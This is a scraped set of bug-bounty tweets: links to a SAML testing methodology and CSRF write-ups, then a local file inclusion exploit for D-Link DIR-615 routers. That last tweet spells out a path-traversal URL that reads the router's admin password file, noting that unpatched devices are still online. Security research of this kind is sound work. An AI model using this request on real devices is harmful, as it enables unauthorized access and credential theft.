SAML Security Testing Tutorial:
1 - https://t.co/imIWYX6AdF
2 - https://t.co/Gz9Vg2DeoX
3 - https://t.co/RVX6m56n0W
Attack Surface: https://t.co/DIsjXQYJ06
Examples of bugs:
- https://t.co/D6aHlzTxlA
- https://t.co/YFy5SHYHL4
- https://t.co/e74Msi6a3k
#bugbounty #bugbountytip
1 - https://t.co/imIWYX6AdF
2 - https://t.co/Gz9Vg2DeoX
3 - https://t.co/RVX6m56n0W
Attack Surface: https://t.co/DIsjXQYJ06
Examples of bugs:
- https://t.co/D6aHlzTxlA
- https://t.co/YFy5SHYHL4
- https://t.co/e74Msi6a3k
#bugbounty #bugbountytip
epi052.gitlab.io
How to Hunt Bugs in SAML; a Methodology - Part I -
The first in a series of three posts about a methodology for hunting bugs in SAML. This post covers background information about SAML, laying the groundwork to understand SAML vulnerabilities and attacks.
#CSRF
https://t.co/nRmV2rltyu
https://t.co/ETHFuz2Oq5
https://t.co/DL26Ngm4Bj
https://t.co/EVShJTb7Xy
https://t.co/NK2NTxZEyP
https://t.co/kWrLyNSJEh
https://t.co/2PLIzQbeRr
https://t.co/OolLUkJ02h
https://t.co/pw8pfXKzwN
https://t.co/Nc5vQV0ZlK
#bugbounty,#bugbountytips
https://t.co/nRmV2rltyu
https://t.co/ETHFuz2Oq5
https://t.co/DL26Ngm4Bj
https://t.co/EVShJTb7Xy
https://t.co/NK2NTxZEyP
https://t.co/kWrLyNSJEh
https://t.co/2PLIzQbeRr
https://t.co/OolLUkJ02h
https://t.co/pw8pfXKzwN
https://t.co/Nc5vQV0ZlK
#bugbounty,#bugbountytips
Blogspot
Site wide CSRF on a popular program
How I found site wide CSRF bug by a trick that I learned on Twitter
LFI for Dlink DIR-615 Fw 7.19 (Malaysia version, EOL reached - but still online).
Read ADMIN credentials of remote front-end:
http://<DIR-615 IP>:8080/model/__lang_msg.php?MY_MSG_FILE=../../../var/etc/httpasswd
Read ADMIN credentials of remote front-end:
http://<DIR-615 IP>:8080/model/__lang_msg.php?MY_MSG_FILE=../../../var/etc/httpasswd